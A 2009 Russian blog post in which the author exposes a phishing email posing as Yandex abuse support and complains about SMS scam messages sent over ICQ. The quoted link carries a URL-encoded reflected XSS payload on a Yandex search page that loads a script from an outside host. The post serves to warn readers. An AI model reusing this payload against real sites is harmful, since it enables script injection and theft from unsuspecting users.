Архив: 13 мая 2009

Решил сегодня удалить письма с яндекса, и встретил одно интересное письмо, якобы от  Платона Щукина:

Дата:    02.05.09 15:58
От кого:    Yandex.Abuse abuse@yandex.ru
Кому:    ********@yandex.ru
Тема:    Ваш сайт нарушил лицензию Яндекса   

Лицом, ответственным за создание или поддержание указанного сайта была нарушена «Лицензия на использование поисковой системы Яндекса». В частности, Ваш сайт использует ссылочный спам, то есть размещает и получает ссылки, предназначенные исключительно для обмана поисковой системы и манипулирования результатами ее работы.

В силу того, что "Яндекс" не может корректно отранжировать страницы вашего сайта и сайтов, цитируемых вашим, по многим поисковым запросам, мы вынуждены временно игнорировать ссылки на сайт _mathelp.spb.ru_.

Мы не вступаем в переписку по поводу степени тяжести нарушения, конкретных адресов страниц на сайте и/или конкретных технических приемов, а также способов устранения проблемы.

Чтобы ссылки на сайт снова учитывались, вам необходимо убрать с сайта элементы, нарушающие упомянутую выше Лицензию. Восстановление может быть произведено после заполнения специальной формы для связи с техническим отделом.


С уважением, Платон Щукин
Служба поддержки Яндекс.Ру

И ссылка, http://mail.yandex.ru/r?url=http%3A%2F%2Fauto.yandex.ru%2Fsearch.xml%3Ftext%3D%2529%2529%253B%253C%252Fscript%253E%253Cscript%2Bsrc%253Dhttp%253A%252F%252Fdpr.papua.go.id%252F333.js%253E%253C%252Fscript%253E&ids=9150000000379771951&fs=inbox&phg=1

Если присмотреться – можно увидеть сайт, на который идёт данная ссылка. Интересно, кто ещё ведётся на такие письма?

Также мне в аську часто приходит от знакомых сообщения типа отошли бегом смс, прямо щас, не тормози, а потом как буду в онлайне – расскажу тебе все… :) А потом как начинаю с ними общаться – они ничего естественно мне не отсылали!!!

Читать запись полностью »